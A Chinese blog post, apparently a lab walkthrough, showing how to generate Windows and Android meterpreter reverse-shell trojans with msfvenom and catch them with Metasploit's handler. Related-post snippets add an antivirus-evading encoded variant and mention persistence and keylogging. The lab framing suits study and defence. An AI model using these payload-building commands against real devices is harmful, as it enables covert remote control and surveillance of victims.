手机+win木马远程复现

最新推荐文章于 2024-08-27 07:56:46 发布
最新推荐文章于 2024-08-27 07:56:46 发布
阅读量74 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77538736/article/details/132868898
版权

复现windows木马远程

环境

  • kali ip:192.168.134.128
  • win7 ip:192.168.134.121

开始复现

  • 登录kali root权限
    在这里插入图片描述
  • 制作exe程序
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.134.128 LPORT=6060 exe > 1.exe
    在这里插入图片描述
    制作成功
  • 把1.exe程序放到win7系统里
    在这里插入图片描述
  • 通过命令启动Metasploit
    msfconsole在这里插入图片描述
    启动成功
  • 运行模块
    use exploit/multi/handler
    在这里插入图片描述
  • 更改信息
    在这里插入图片描述
    更改完成
  • 运行模块监听
    在这里插入图片描述
  • 打开win7系统运行1.exe程序
    在这里插入图片描述
    在这里插入图片描述
    成功监听到目标机
  • 截个桌面图看看
    在这里插入图片描述
    成功截取到

手机远程木马复现

环境

  • Android ip:192.168.1.100
  • kali ip:192.168.1.101

开始复现

  • 制作apk软件
  • msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=6061 >3.apk
    在这里插入图片描述
    制作成功
  • 通过命令启动Metasploit
    msfconsole
    在这里插入图片描述
    运行成功
  • 运行模块并更改参数
    在这里插入图片描述
  • 运行模块监听
    在这里插入图片描述
  • 在Android模拟器里点击安装包
    在这里插入图片描述
    在这里插入图片描述
    成功监听到并连接上

结尾

还有好多功能没有演示,再次说明网络上的各种软件链接谨慎下载。

Fmmy
关注
内网渗透-window权限维持
lza20001103的博客
09-26 2262
window权限维持 文章目录window权限维持前言meterpreter权限维持persistencemetsvc系统工具替换后门iexplore.exenarratoroskutilmannotepadmsf模块开机自启动注册表项nc后门schtasks快捷方式劫持账号隐藏后记 前言 上期讲完了横向移动后,我们拿到了管理员的权限,当我们离开时,下一次要是还想拿到的是管理员的权限呢,难道我们还要继续一波操作提取啥的吗,其实不然,接下来将是最重要的内容,就是我们的权限维持的操作了,对于后渗透有着至关重要的
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
热门推荐
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 9675
Meterpreter 是 Metasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
如何使用kali来入侵(渗透)一台windows
最新发布
dzqxwzoe的博客
08-27 1623
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
Windows提权,网络安全编程基础
m0_60607895的博客
04-08 966
msset payload windows/meterpreter/reverse_tcp # 设置payload,不同的木马设置不同的payload,设置payload时,要根据目标系统的系统位数设置相应的payload;set lhost 192.168.x.x # 我们的kali本机ipset lport 6666 # 我们的kali本机端口exploit使用msfvenom模块生成反弹木马:伪装成cmd.exemsfconsole # 在命令行里面输入命令,进入msf漏洞利用框架;
生成木马反弹和简单的Windows提权
BRMTSW的博客
03-01 708
生成木马反弹和简单的Windows提权
Meterpreter 提权
eli的博客
05-20 2314
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
漏洞复现:使用Kali制作木马程序
m0_51617352的博客
12-15 6054
攻击机:Kali2019 靶机:Win7 64位 攻击步骤: 1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段 2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下 命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pink.exe .
[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 727
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
畅捷通T+任意文件上传(CNVD-2022-60632 )漏洞复现
la-大白
10-28 3327
畅捷通T+软件任意文件上传漏洞
复现mysql 备份上传木马,并用shell工具连接操作
weixin_64655821的博客
08-25 391
复现mysql 备份上传木马,并用shell工具连接操作
Qt下载安装及配置教程(非常详细),从零基础入门到精通,看完这一篇就够了
Innocence_0的博客
08-19 4659
下载开源版往下滑,下载Qt在线安装程序它已经检测出我的是windows系统,直接点击download就好。如果是其它的系统,需要找到对应自己系统的安装包。然后跟网速有关,等一会就会自动下载等待下载完成,双击.exe文件,就可以进行安装。首先就是登录qt账户,如果没有可以自行注册一个。然后选择个人用户,之后点击下一步进行安装。如果没有报错,那继续往下:这一步是问你对qt有什么改善的建议,我这里直接选择没有,然后继续进行下一步。
MS16_016 漏洞利用与安全加固
theRavensea
03-18 896
MS16_016 漏洞产生的原因是由于 Windows 中的 WebDAV(分布式创作和版本管理)未正确处理客户端发送的信息,攻击者可以运行经过特殊设计的应用程序,从而提升权限。
使用msfveonm后门生成模块和msfconsole获取主机权限(windows)
X1DD1Asad343的博客
06-05 464
运行(为了保证设置的参数的正确性,在运行前可以使用show options 命令检查对应参数是否设置正确)监听需要使用到msfconsole(MSF)中的exploit/multi/handler监听模块。配置相应参数(可以使用show options 命令查看参数情况)设置监听端口(在不设置监听端口的情况下,默认监听端口为4444)后门在目标设备上运行后,监听设备即可看到目标设备上线。获取shell,同时查看当前用户权限信息。设置监听主机(一般就是kali的IP)接下来可以尝试输入一些命令。
手把手教你如何利用Meterpreter渗透Windows系统
weixin_34384557的博客
11-30 712
在这篇文章中,我们将跟大家介绍如何使用Meterpreter来收集目标Windows系统中的信息,获取用户凭证,创建我们自己的账号,启用远程桌面,进行屏幕截图,以及获取用户键盘记录等等。 相关Payload Payload中包含有需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这...
【漏洞检测】metasploit 使用教程
A1_3_9_7的博客
12-29 978
Metasploitv4之后的新版本中,Meterpreter作为后渗透攻击模块的实施通道,可以根据渗透测试目标需求进行灵活扩展。涉及范围: 信息搜集、口令攫取、权限提升、内网拓展等。攻击载荷(msfpayload)是我们期望目标系统在被渗透攻击后去执行的代码,在metasploit框架中可以自由的选择、传送和植入。....Msf编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序的功能不会受到任何影响。
使用大白鲨进行木马攻击实验并实现爆破目标机账号密码以远程连接
Zeker62的博客
08-06 3171
实验环境建议在虚拟机上运行 科学无罪,所有实验环境都在局域网内进行 实验条件 两个Windows虚拟机 一个安装大白鲨远程控制软件 两个虚拟机开启ftp服务(用于木马文件之间的传输) 大白鲨远程控制软件是一个比较旧的攻击软件 大白鲨远程控制 2010 Bate1(v1.6) 运行平台:Win2K、WinXP、Win03、WinVista、Win07、Win2008 软件简介: 兼容1.4~1.3版本 单一exe,不带DLL文件(无可没配置前114KB,压缩52KB)! 注入进程兼容win7/win8
VC创建远程控制命令行木马程序
"该资源提供了一个简单的基于Win32环境的VC++代码片段,用于创建一个远程控制木马。这个木马通过监听TCP端口999,等待远程连接,并在接收到连接后启动命令行(CMD)进行操作。代码仅供学习交流,禁止用于非法目的。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值